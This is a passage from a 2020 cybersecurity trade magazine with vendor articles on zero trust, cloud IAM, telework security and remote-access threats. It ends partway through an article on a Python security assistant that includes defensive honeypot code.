has been the most viable resource for those seeking medical counsel during this time. Unfortunately<br />
there have also been over 3,000 healthcare-related breaches that have impacted more than 500 million<br />
medical records in the past decade, a trend that has been escalating year-over-year. Due to the high<br />
amount of personal information, medical records command a high value on the dark web and can be<br />
listed for up to $1,000 each, 10 times more than the average credit card data breach record.<br />
<strong>Cyber</strong>criminals can then easily obtain this information and impersonate legitimate patients.<br />
This stolen information can also be used to obtain free medical or dental care. Because of this, CIOs will<br />
scramble to ensure procedures are in place so that doctors know their patients are who they say they are<br />
—and this is the domain of the emerging field of Know Your Patient (KYP). This means healthcare<br />
provider organizations need to adopt identity safeguards similar to the Know Your Customer (KYC)<br />
regulations adopted by the financial service industry.<br />
About the Author<br />
Robert Prigge is responsible for all aspects of Jumio’s business and<br />
strategy. Specializing in security and enterprise business, he held C-level<br />
or senior management positions at Infrascale, Secure Computing,<br />
McAfee, Quest Software, Sterling Commerce and IBM. Robert can be<br />
reached online via LinkedIn, on Twitter @rprigge and at Jumio’s website,<br />
www.jumio.com.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 118<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The Future Of Security – Predictions Post COVID-19<br />
By Mike Riemer, Pulse Secure, Global Chief Security Architect<br />
The Future of Work post COVID-19 - Larger Remote Workforce with <strong>Cyber</strong>security Built into the<br />
Culture<br />
“A recent Gartner survey of over 300 CFO’s found that 74% of respondents say they expect to move<br />
previously on-site employees to remote post-COVID-19. As such, a large remote workforce is forcing<br />
companies to re-evaluate how to evolved their corporate culture and invest in capital. Embedding a longterm<br />
cybersecurity strategy as part of this evolution to keep workers safe will be critical.<br />
Ultimately, an effective security culture mitigates the risk of a breach as a result of credential theft,<br />
phishing and business email compromise (BEC) – and working with employees to protect their privacy<br />
addresses a growing issue for many people, 28% of whom have had their identity hacked or stolen. That<br />
number increases to 35% when looking at the entire U.S.<br />
However, as businesses are quick to ditch their office spaces, they will need to allow employees to have<br />
secure remote access to corporate systems as well as implement Zero Trust. Zero Trust is an approach<br />
based on the concept of continuous verification and authorization. It ensures that only authenticated<br />
users with compliant devices, whether corporate, personal or public, can connect to authorized<br />
applications over any network, whether on-premises or in the cloud. This will help remote workers to<br />
engender more confidence that their business and personal data is secure. “<br />
Zero Trust Must be Part of the Future of Work During and Post COVID-19<br />
“The need for Zero Trust security has never been greater, especially due to increased targeted attacks,<br />
rapid work from home mandates, and mounting privacy compliance obligations due to COVID-19. As<br />
such, enterprise adoption of the Zero Trust security model is growing as mobility and hybrid IT models<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 119<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
have placed most workloads beyond the shelter of corporate networks and traditional perimeter defense.<br />
This creates significant user access and data concerns.<br />
The <strong>2020</strong> Zero Trust Progress Report by Pulse Secure revealed that nearly a third of cybersecurity<br />
professionals have expressed value in applying Zero Trust to address hybrid IT security issues. This<br />
report, which surveyed more than 400 cyber security decision makers, found that 72% of organizations<br />
plan to assess or implement Zero Trust capabilities in some capacity in <strong>2020</strong> to mitigate growing cyber<br />
risk, while nearly half (47%) of cyber security professionals lack confidence applying a Zero Trust model<br />
to their Secure Access architecture.<br />
With its principle of user, device and infrastructure verification before granting conditional access based<br />
on least privilege, Zero Trust holds the promise of vastly enhanced usability, data protection and<br />
governance and must be part of any security architecture as we navigate the current COVID-19 business<br />
landscape.”<br />
Telemedicine and Remote Field Offices are Changing the Needs of Healthcare Professionals<br />
“Healthcare is going the way of other industries with employees being asked to work remotely and post<br />
COVID-19, we believe the use of telemedicine and remote field offices will be the new normal in<br />
healthcare.<br />
As such, IT teams must provide healthcare workers with mobile devices that are protected, even on<br />
expanded Wi-Fi networks or cellular networks as employees are often working outside secure networks,<br />
opening their mobile devices to additional threats.<br />
Increasing remote capacity on network protections such as VPNs, extends security to those workers in<br />
the field, ensuring that both patient information as well as other personal information stored on those<br />
devices is safe. By deploying Zero Trust policies, info security teams can also implement fine-tuned user<br />
access management to ensure that network capacity is maximized and that workers only have access to<br />
the information that’s absolutely necessary.”<br />
About the Author<br />
Mike Riemer is the Global Chief Security Architect for Pulse Secure, where<br />
he has worked for the last six years. He has over 37 years of IT and IT<br />
Security experience and is a Certified Instructor on Firewall/Virtual Private<br />
Networking, Intrusion Detection/Prevention, SSL/VPN and Network Access<br />
Control disciplines. He previously spent 25 years with the U.S. Air Force<br />
working in <strong>Cyber</strong> Security and Intelligence.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 120<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Post COVID-19 <strong>Cyber</strong>security and Future-of-Work<br />
Predictions<br />
By DivvyCloud by Rapid7, Chris DeRamus, VP of Technology, Cloud Security Practice<br />
Remote work is here to stay:<br />
“Some organizations (including DivvyCloud) preferred coming into the office for work prior to the<br />
pandemic because we enjoyed the sense of community. But, the current situation has changed our<br />
outlook on remote work, and the same is true for many organizations around the world. Many companies<br />
are quickly realizing their employees are just as productive working from home through cloud apps and<br />
services as they are in the office space. In fact, in many cases employees are even more productive<br />
because they don’t waste time commuting. As such, we should expect plenty of organizations to transition<br />
to more frequent (or even permanent) remote work models once stay-at-home orders have been lifted.<br />
Organizations may even reduce or eliminate office spaces to cut back on overhead costs , especially<br />
those looking to climb out of economic hardship caused by the pandemic.”<br />
To support remote work, organizations will need to prioritize cloud spend:<br />
“Organizations have been spending more on cloud infrastructure to support their remote workforces.<br />
Increased demand spurred AWS’ sales to surpass $10 billion this past quarter and Azure is running out<br />
of capacity in some regions. As a result, organizations will need to “tighten the operational belt” from a<br />
budget perspective and ensure that the proper security and governance controls, virtual desktop<br />
infrastructure (VDIs), and other key instances are implemented.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 121<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
For DivvyCloud and plenty of other organizations, real-time communications platforms like Slack and<br />
Teams have been invaluable for navigating the work-from-home experience, and we can expect to see<br />
a heightened demand for these tools even once this pandemic subsides. Additionally, organizations will<br />
need to focus on identity and access management in their cloud infrastructure. This will ensure<br />
employees are able to securely access the tools and resources they need to do their jobs while thwarting<br />
fraudulent unauthorized attempts from bad actors.”<br />
Choosing between security and innovation in the cloud will continue to be a common, avoidable<br />
pitfall:<br />
“Nearly 50% of developers and engineers bypass cloud security and compliance policies and just 58%<br />
of organizations have clear guidelines for developers building applications in the public cloud. Developers<br />
work hard and fast to deploy new features and services to meet market demands, but without the proper<br />
guardrails in place, this can lead to misconfigured cloud instances, severe security flaws, and more.<br />
In fact, in early April, it became publicly known that Zoom’s engineers bypassed common security<br />
features, such as not requiring users to add unique file names before saving their videos. While this<br />
allowed Zoom to support its exponential jump in demand (from 10 million daily users in December 2019<br />
to over 200 million in March <strong>2020</strong>), it also resulted in errors such as thousands of users’ videos being<br />
made publicly accessible on unprotected Amazon buckets. This news added to a string of other privacy<br />
concerns around Zoom. DevOps and security must be completely in sync to avoid similar pitfalls.<br />
Engineers will begin to tackle cloud security flaws earlier in the build pipeline:<br />
“Security and compliance practices have been mainly reactive, with teams scrambling to catch<br />
security/compliance flaws after cloud resources are built. But as anyone in that position can attest, there’s<br />
no putting the genie back in the lamp. Instead, engineers will need to focus on how “to-be-built”<br />
infrastructure or changes will affect the security and compliance of their cloud footprint while they are still<br />
in the continuous integration/continuous deployment pipeline.<br />
For example, Zoom’s CEO pledged to shift the company’s engineering resources to proactively address<br />
issues with measures such as a third-party review of changes before they’re made, white box pen tests<br />
to further identify and address issues, and upgrading Zoom’s encryption scheme to AES 256-bit GCM<br />
encryption. Other organizations will leverage capabilities such as Infrastructure as Code security to build<br />
a virtual data model of what would have been built and either affirm or deny the compliance of proposed<br />
changes while also warning engineers of potential violations, thus giving them the opportunity to learn<br />
from the experience and incorporate learnings into future projects.”<br />
IAM is (and will continue to be) the primary perimeter in cloud security:<br />
“All users, apps, services, and systems in the cloud have an identity, and as organizations shifted to<br />
remote styles of work, they quickly learned that these relationships are complex. Understanding the full<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 122<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
picture of access in the cloud and working toward least privileged access are difficult , but necessary<br />
endeavors to ensure security in the cloud. In the last couple months, plenty of enterprise security<br />
professionals have realized that cloud identity and access management (IAM) is an area where they are<br />
vulnerable because they lack insight into the complex problem.<br />
The repercussions of poor IAM governance are substantial and sometimes unpredictable. For example,<br />
last year a former AWS employee accessed over 100 million Capital One customers’ records after she<br />
bypassed a misconfigured web application firewall, then used privileged escalation to access the data.<br />
To protect the identity perimeter at scale, organizations need an automated monitoring and remediation<br />
solution for access management, role management, identity authentication and compliance auditing – all<br />
of which help enterprise security teams stay ahead in this complex landscape. Even once this pandemic<br />
subsides, we will continue to see a great emphasis placed on cloud IAM, especially as organizations<br />
continue to encourage remote work.”<br />
About the Author<br />
Chris is the VP of Technology, Cloud Security Practice at DivvyCloud<br />
by Rapid7. He is a technical pioneer whose passion is finding<br />
innovative and elegant new ways to deliver security, compliance and<br />
governance to customers running at scale in hybrid cloud<br />
environments. He remains deeply technical, writing code and diving<br />
into the latest technologies and services being deployed by partners<br />
like Amazon, Microsoft, Google, VMware, and OpenStack.<br />
Before co-founding DivvyCloud, Chris was the Online Operations<br />
Manager at Electronic Arts for the Mythic Studio where he helped<br />
design, build and operate large scale cloud infrastructure spanning public and private clouds to run<br />
Electronic Art’s largest online games (including Warhammer Online: Wrath of Heroes and Warhammer<br />
Online: Age of Reckoning). He started his career as a Network & System Administrator at the U.S.<br />
Department of Energy where he was mandated with a broad array of technical responsibilities including<br />
security and compliance.<br />
Chris earned his Bachelor of Business Administration in Computer Information Systems from James<br />
Madison University.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 123<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Building A Telework Health Scorecard To Meet Surge<br />
Requirements And Long-Term Resiliency<br />
By Stan Lowe, Global Chief Information Security Officer, Zscaler<br />
Over the past months, the U.S. Federal government has deployed solutions to keep employees<br />
productive and secure from any location, including at home. The initial rapid response typically included<br />
increasing capacity, deploying new remote access options, and enhancing security measures.<br />
As CIOs and CISOs move forward from the initial crisis mode, they now need to take a harder look at the<br />
systems in place – what is working and what is needed. But, to get the right answers, we have to ask<br />
the right questions.<br />
There are different sets of considerations and evaluation questions to ask in initial crisis phases vs. in<br />
steady-state environments. IT leaders can build customized telework health scorecards for these two<br />
phases to provide a comprehensive view and then prioritize the next steps.<br />
Initial Crisis Telework Health Evaluation Criteria<br />
1. What do we need to do? Prioritize the most important tasks. Then, consider the resources users<br />
will need and what can be postponed or cut altogether.<br />
2. Who needs access, when? Consider the access policies needed to align access with mission<br />
priorities. Do all employees need to have always-on connectivity? What work requires only occasional<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 124<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
connectivity? To ensure comprehensive, secure access, agencies may initially need to take a “tiered”<br />
connectivity approach.<br />
3. How can employees connect? Some employees may have had government-issued laptops and<br />
devices prior to the crisis, but do all employees now need laptops? Prioritize needs. Then, evaluate<br />
risks and develop BYOD policies and education.<br />
4. Can we stagger work hours? It may not be possible to accommodate an almost entirely remote<br />
workforce within the typical 9-5 hours. Some agencies can adjust work hours, moving mission critical<br />
work to the “graveyard-shift” hours to ensure seamless connectivity to perform critical duties.<br />
5. How do we improve performance/connection speed? As the network perimeter expands, many<br />
agencies are moving to the cloud through a secure access service edge (SASE) model. Direct access<br />
via internet breakouts provides fast, secure access for all users.<br />
What’s Next? Evaluating and Evolving Telework Health for the Long Haul<br />
Once mission critical teams are operational in remote environments and the organization has moved past<br />
that initial crisis response – the next step is to take the lessons learned and evaluate how to continue<br />
down the modernization path. What will drive simplicity, reduce costs, and create scalability for any future<br />
COOP scenarios?<br />
This is not a one-and-done process but should be built into ongoing IT operations and planning.<br />
Here are six design architecture questions to help frame telework health – with the goal of driving digital<br />
transformation and improve security, access, and support for remote employees:<br />
1. Do we provide a seamless user experience with direct access to internal and external<br />
applications?<br />
Agencies need to adjust security from traditional, legacy appliance-based tools, such as VPNs, to a<br />
solution that secures traffic no matter where the user or target application resides. Zero trust connections<br />
allow users to directly access applications in any location. This eliminates the hair-pinning caused by<br />
backhauling traffic through a VPN, reduces traffic, and reduces latency – ultimately, improving the user<br />
experience. Zero trust also never puts users on the network, reducing the attack surface.<br />
2. Do we have context-aware access?<br />
Users should only be given access to resources and applications necessary for their job functions.<br />
Agencies should develop clear access policies and rules enforced through a zero trust security model,<br />
where only authorized users will be granted access to authorized applications. This can further limit eastwest<br />
traffic on the network so that users will not reach applications they were not intended to reach.<br />
Context-aware access also delivers benefits beyond work-from-home security, such as mergers and<br />
acquisitions, cloud migration, third-party access, and more. Zero trust network access solutions address<br />
all of these scenarios with simple policies that are user-centric, rather than network-centric.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 125<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
3. Are we enabling flexible deployment for instant and seamless expansion?<br />
A cloud-based zero trust service can provide a scalable environment without placing a significant burden<br />
on the IT team. Agencies can start with an initial use case and transition from broad policies to more<br />
granular and specific policies as they go. And, many Federal agencies already have elements of zero<br />
trust in their infrastructure, such as endpoint management, Continuous Diagnostics and Mitigation,<br />
software-defined networking, micro-segmentation, and cloud monitoring. Once zero trust access is fully<br />
operational, decommission VPN access for the group, then iterate as necessary.<br />
4. How are we providing comprehensive visibility and troubleshooting that enables rapid userissue<br />
resolution?<br />
In a legacy environment, you can’t protect what you don’t know is there. A disadvantage of legacy<br />
solutions is that data is often distributed across the environment, and agencies often use complex tools<br />
with multiple interfaces, methodologies, and terminologies. This creates a higher likelihood that bad<br />
actors could be hiding in the background, hoping to be overlooked. Zero trust provides IT administrators<br />
with a single pane of glass view to manage, administer, and log users in one place. Administrators will<br />
have full visibility and control into the distributed environment.<br />
5. How do we reduce security and remote access infrastructure maintenance requirements?<br />
Appliance-based remote access solutions constantly need updates on firmware, software, security, and<br />
policies to keep up-to-date with technology and advancing security risks. A cloud Software-as-a-Service<br />
model greatly reduces management and upkeep. This can free up time for agencies to focus on more<br />
critical mission needs along with improving their policies, instead of patching security holes.<br />
6. What will ensure scalability for future COOP scenarios?<br />
Legacy remote access solutions, such as VPNs, may require adjustments to bandwidth, throughput, or<br />
additional technology adoption to scale to meet operational needs. Many agencies’ initial reactions to<br />
the current crisis have been to grow capacity by implementing new infrastructure or adding new<br />
appliances. But, a cloud-native capability is the only solution that can easily scale up and down as<br />
needed when future COOP scenarios arise.<br />
Cloud-delivered zero trust SASE models will transition security from network-centric controls and remote<br />
network connectivity to user-centric and application-centric security, designed to support highly<br />
distributed teams working beyond the traditional network perimeter.<br />
One thing we’ve learned from these past months is that every agency needs a systematic process to<br />
evaluate telework health. These questions and review processes will create a stronger, more resilient<br />
government that can keep employees safe, productive, and focused on delivering citizen services.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 126<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
Stan Lowe,Global Chief Information Security Officer.Stan<br />
Lowe, a cybersecurity and technology executive, has<br />
successfully led transformational change in large, complex<br />
environments, as well as small and mid-size cybersecurity<br />
and IT organizations.<br />
As Zscaler Global Chief Information Security Officer, Stan<br />
oversees the security of the Zscaler enterprise and works with the product and operations groups to<br />
ensure that Zscaler products and services are secure. Part of his focus is to work with customers to help<br />
them fully utilize Zscaler services and realize the maximum return on their investment.<br />
Prior to joining Zscaler, Stan served as the VP & Global Chief Information Security Officer for<br />
PerkinElmer, where he was responsible for global enterprise security and privacy. He has also been a<br />
<strong>Cyber</strong> Security Principal at Booz Allen Hamilton.<br />
Stan has extensive federal experience, serving as the U.S. Department of Veterans Affairs (VA) Deputy<br />
Assistant Secretary for Information Security, Chief Information Security Officer, and Deputy Chief Privacy<br />
Officer, as well as Deputy Director of the Department of <strong>Defense</strong>/VA Interagency Program Office. Before<br />
joining the VA, Stan served as Chief Information Officer of the Federal Trade Commission. Stan’s public<br />
service record extends to the U.S. Department of Interior in the Bureau, the U.S. Postal Service Inspector<br />
General, and the U.S. Navy.<br />
Stan has also served as an executive in several technology startups, and currently serves on several<br />
boards advising on cybersecurity. He is a frequent speaker and writer on security topics.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 127<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
CERT Warns Bad Actors Are Targeting Remote<br />
Access – How Security Operations Find And Route These<br />
“Below The Radar” Attacks<br />
New Ransomware/Exfiltration Campaign Targeting Remote Access Resists Resolution Through Data<br />
Restoration<br />
By Saryu Nayyar, CEO, Gurucul<br />
Remote access tools, such as VPN’s, RDP, VNC, Citrix, and others, have always been an inviting target<br />
for attackers. Even 2003’s Matrix Reloaded used an exploit against an old version of Secure Shell (SSH)<br />
as a plot device in a rare cinematic example of a real-world cyber-security threat. The recent shift to a<br />
remote workforce in response to a global pandemic has made remote access an even more inviting target<br />
for threat actors of all stripes.<br />
As a recent report from New Zealand’s CERT pointed out, malicious actors are actively focusing on<br />
remote access vectors, using a range of attack techniques. While unpatched systems are an ongoing<br />
issue, attackers are also targeting weak authentication schemes, including a notable lack of two-factor<br />
authentication. The users themselves are also a primary target. Targeted email such as spear phishing,<br />
which goes for a specific target, or cast-netting, that targets people within a single organization, have a<br />
history of success and have seen a noticeable rise.<br />
Fortunately, information security professionals still have a range of tools and techniques they can use to<br />
help prevent breaches and to mitigate them when they do happen.<br />
Many attack scenarios, especially ones involving remote access attacks, start with targeting the users<br />
themselves. Many penetration testers will tell you the users are the easiest target and the first thing<br />
they’ll go after. But this also gives an organization the opportunity to convert their user base from part of<br />
the attack surface into their first line of defense. Making sure you have trained them on best practices<br />
and have enabled a strong multi-factor authentication scheme can go a long way to preventing<br />
unauthorized access.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 128<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
For many organizations, the Security Operations team, rather than their users, is the main line of<br />
defense. Even when the services are provided whole, or in part, by a third party, they are the ones who<br />
have the ultimate responsibility for the organization’s security well-being. Which means assuring they<br />
have the correct tools and the right training is as important as making sure the users are trained and<br />
equipped. The question becomes whether they have the right tools and training to identify and mitigate<br />
attack profiles that have now shifted to target the remote workforce.<br />
The threats they have been historically focused on have not disappeared, but they may no longer be the<br />
primary attack surface. Likewise, the tools they use to identify and mitigate attacks may not be the best<br />
ones now that the attacker’s focus has shifted.<br />
Threat actors have become increasingly skilled at compromising systems and then hiding their activity<br />
“below the radar” to avoid detection, which makes their activity harder to detect. More so now that they<br />
have a remote workforce to both target for attack and use for concealment. That means the SecOps<br />
team will need to look at the situation holistically rather than relying on single indicators of compromise.<br />
To that end, an advanced security analytics platform that can consolidate all the organization’s security<br />
data into a single place and then perform AI-based analytics the entirety of the data may be in order. By<br />
looking at all the information, it is possible to identify anomalous behavior that differs subtly from what’s<br />
expected, or accepted, for a normal user. That can be the first indication of a compromise. Using<br />
machine learning techniques, the system can adapt to the changing threat surface and present a riskbased<br />
assessment to the SecOps team.<br />
Combined with their existing tools and efficient automation, security operations personnel can get ahead<br />
of an attack to keep a single compromised account or remote access system from escalating to a serious<br />
data breach.<br />
About the Author<br />
Saryu Nayyar is the CEO of Gurucul. She is an internationally<br />
recognized cybersecurity expert, author and speaker with more<br />
than 15 years of experience in the information security, identity<br />
and access management, IT risk and compliance, and security<br />
risk management sectors. She was named EY Entrepreneurial<br />
Winning Women in 2017. She has held leadership roles in<br />
security products and services strategy at Oracle, Simeio, Sun<br />
Microsystems, Vaau (acquired by Sun) and Disney, and held<br />
senior positions in the technology security and risk management practice of Ernst & Young. She is<br />
passionate about building disruptive technologies and has several patents pending for behavior analytics,<br />
anomaly detection and dynamic risk scoring inventions.<br />
Saryu can be reached on Twitter at @Gurucul<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 129<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
CRYPTO<br />
An Amalgamation of <strong>Cyber</strong> <strong>Defense</strong> and Ethical Hacking Mechanisms<br />
By Staford Titus S<br />
Prelude<br />
Security on its own is a misnomer in this technological and (for the most part) cybernated era. <strong>Cyber</strong>-<br />
Security has emerged as a crucial factor in protecting almost every, or atleast the online aspect of human<br />
lives. The preponderance of electronic devices used are computers, including mobile phones, Smart TVs<br />
and even smart watches, all of which contain personal or business data. <strong>Cyber</strong>crimes take place<br />
ubiquitously, wrecking havoc by causing loss and sometimes even misuse of these information.<br />
According to RiskIQ’s 2019 Evil Internet Minute, cybercrimes cost around $2.9 million dollars to the global<br />
economy every minute. This invokes the necessity to secure data, to prevent it from being stolen or<br />
compromised. It is thus, unerring to assume that cybercrimes are imminent, and hence, preventive<br />
countermeasures are required to be set in place to sail above these turbulent waves of cyber-attacks.<br />
Centralizing this theme, initialised the development of Crypto. The idea involves developing an AI<br />
assistant that is capable of implementing secure policies using built-in security tools and also aid in ethical<br />
hacking operations. For those of you, for whom, on reading the word AI, nightmares of AI world<br />
domination are imminent:<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 130<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Fig 1: AI Meme<br />
This article documents the several security and hacking methodologies infrastructured in Crypto. A good<br />
number of security policies and frameworks have been implemented to help secure the systems.<br />
The Root<br />
The developmental strategies involved are loosely adhered to and inspired by the control<br />
strategies/countermeasures discussed by one, Charles P. Pfleeger in the book “Security in Computing”.<br />
According to Fig 2 we can deal with cyber attacks in the following ways:<br />
1. prevent it, by blocking the attack or closing the vulnerability<br />
2. deter it, by making the attack harder but not impossible<br />
3. deflect it, by making another target more attractive (or this one less so)<br />
4. mitigate it, by making its impact less severe<br />
5. detect it, either as it happens or some time after the fact<br />
6. recover from its effects<br />
“Prevention is better than cure!” Ensuing that statement is what is aimed to be accomplished, since it’s<br />
always better to prevent an attack, than building back upon its wreckage. The aforementioned strategies<br />
are implemented in several different ways, of which, an example is the Intrusion Detection System, that<br />
helps detect anomalies and intrusions and direct it to honeypots or isolated networks, in turn incorporating<br />
a pooled approach of the control strategies.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 131<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Fig 2: Control Strategies from the book “Security in Computing”<br />
Under the Hood and UI<br />
Built with primary intentions to implement security mechanisms and countermeasures along with hackeraiding<br />
tools, fueling Crypto’s underlying architecture is good old Python. Python was considered over<br />
other programming languages due to the sheer size of the open-source libraries and packages that it<br />
offers. Eel was introduced in the infrastructure to establish undeterred connection between the frontend<br />
and backend functions/mechanisms. Eel is a little Python library for making simple Electron-like offline<br />
HTML/JS GUI apps. Eel offered so much more than it promised which helped incorporate several features<br />
which previously couldn’t be fused. Implementing Eel is as simple as adding an “@eel.expose” line before<br />
a function in python. Contemplating over the versatility as well as user-friendliness and also considering<br />
the various design milestones that could be reached using HTML and CSS, the offering is not a CLI tool<br />
but has a natty looking GUI. Centre-Bottom is the user input, Top-Middle is the chat box, Bottom-Left is<br />
the news tab, Bottom-Right is the console, that displays all of the console logs and messages and Top-<br />
Right is the Date & Time and weather data. Top-Left is reserved for popup menus. The next few sections<br />
elucidate the several security and hacking mechanisms implemented in the project module.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 132<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Fig 3: Screengrab of Crypto’s UI<br />
Security Mechanisms<br />
Honeypot<br />
Luring an unsuspicious attacker into a trap is the singular mechanism that a Honeypot implements.<br />
According to wikipedia, a honeypot is a computer security mechanism set to detect, deflect, or, in some<br />
manner, counteract attempts at unauthorized use of information systems. Creation of honeypot on any<br />
port belies it as a decoy enticing to the attackers, thus enabling prevention or at least deceleration of<br />
attacks to the main system. Logging the honeypot environment for any of the activities performed by<br />
attackers mistaking the honeypot for a real loophole is also implemented to enhance the security policy.<br />
The logs can be sent to the users’ mail or even stored on remote servers such as graylog for future<br />
pattern analysis. Below is a code sample of the honeypot:<br />
@eel.expose<br />
def honeypot():<br />
LHOST = '0.0.0.0'<br />
LPORT = 1024<br />
RHOST = '192.168.29.203'<br />
RPORT = 9000<br />
BANNER = '220 ProFTPD 1.2.8 Server\nName: '<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 133<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
TIMEOUT = 10<br />
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
def hon():<br />
print ('[*] Honeypot starting on ' + LHOST + ':' + str(LPORT))<br />
eel.test('[*] Honeypot starting on ' + LHOST + ':' + str(LPORT))<br />
atexit.register(exit_handler)<br />
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)<br />
listener.bind((LHOST, LPORT))<br />
listener.listen(5)<br />
while True:<br />
(insock, address) = listener.accept()<br />
insock.settimeout(TIMEOUT)<br />
print ('[*] Honeypot connection from ' + address[0] + ':' + str(address[1]) + ' on port ' + str(LPORT))<br />
eel.test('[*] Honeypot connection from ' + address[0] + ':' + str(address[1]) + ' on port ' +<br />
str(LPORT))<br />
try:<br />
insock.send(BANNER.encode())<br />
data = insock.recv(1024)<br />
except socket.error as e:<br />
sendLog(address[0],'Error: ' + str(e))<br />
else:<br />
sendLog(address[0],data)<br />
finally:<br />
insock.close()<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 134<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
hon()<br />
Fig 4: Screengrab of Honeypot in Action<br />
Intrusion Detection System<br />
Intrusion Detection is a particularly, very important mechanism to implement, since detecting an anomaly<br />
or intrusion is the fundamental step in protecting a system. It is based on strategies involved in applying<br />
round-the clock detection and scanning. The IDS is created as a virtual network using mininets which<br />
serve as honeypot hosts that continually monitor the traffic flowing in and out of the network for anomalies.<br />
If an anomaly or outlier is detected, then an email is sent to the user of the same, and fake SYN packets<br />
are sent for the attackers to connect to a virtualized and isolated mininet network. This mechanism is still<br />
under rudimentary development and testing owing to the length and breadth of operations and functions<br />
it aims to deliver.<br />
Parser Differential<br />
This mechanism is implemented inorder to cripple the various elf executable decompilers out there.<br />
Hence, the given c program code is run through an algorithm to make it unreadable by the decompilers<br />
such as radare2 or even gdb. This mechanism is highly influenced by LiveOverflow’s Reversing series.<br />
Hence cracking programs to find license keys get much harder. This parser differential module allows<br />
the user to upload C programs that they want to scramble and hence prevent cracking. The underlying<br />
algorithm is quite simple but extremely effective. Only one random byte within the code is scrambled so<br />
that it renders the whole code unreadable to decompilers but not to the Linux terminal. Hence the code<br />
can be executed but not decompiled.<br />
Facial Recognition<br />
Facial Recognition is a Biometric Artificial Intelligence based algorithm that can uniquely identify a person<br />
by analyzing patterns based on the person's facial textures and shape. Facial Recognition has been<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 135<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
implemented based on the javascript face recognition library using Haar-Cascades. Hence, this<br />
implementation enhances the security disabling misuse of the features by strangers or unknown<br />
individuals.<br />
Hacking Mechanisms<br />
Port Scanning<br />
Reconnaissance is the first step to any hacking activity, since it is highly important to analyze the intended<br />
target on an intricate, or at the least, a basic level. Port scanning is one such pre-enumeration method<br />
used to identify open ports and services available on a network host. It could also be considered as a security mechanism,<br />
since from the countermeasures defined above, it is a method of detection/prevention. It can be performed for detection of<br />
